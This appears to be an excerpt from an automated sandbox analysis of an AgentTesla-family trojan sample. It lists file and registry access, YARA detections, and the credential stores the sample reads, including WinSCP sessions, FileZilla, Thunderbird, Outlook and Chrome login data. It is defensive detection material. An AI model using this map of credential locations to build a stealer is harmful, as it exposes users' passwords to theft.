                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\micross.ttf (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ (VolumeInformation)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll (VolumeInformation)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.36caa98.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.37dd780.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.36caa98.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.935726036.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.713196181.0000000003609000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe PID: 3740, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe PID: 6412, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\

Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: Yara match | File source: 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe PID: 6412, type: MEMORYSTR

Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.36caa98.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.37dd780.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe.36caa98.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.935726036.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.713196181.0000000003609000.00000004.00000001.sdmp, type: MEMORY
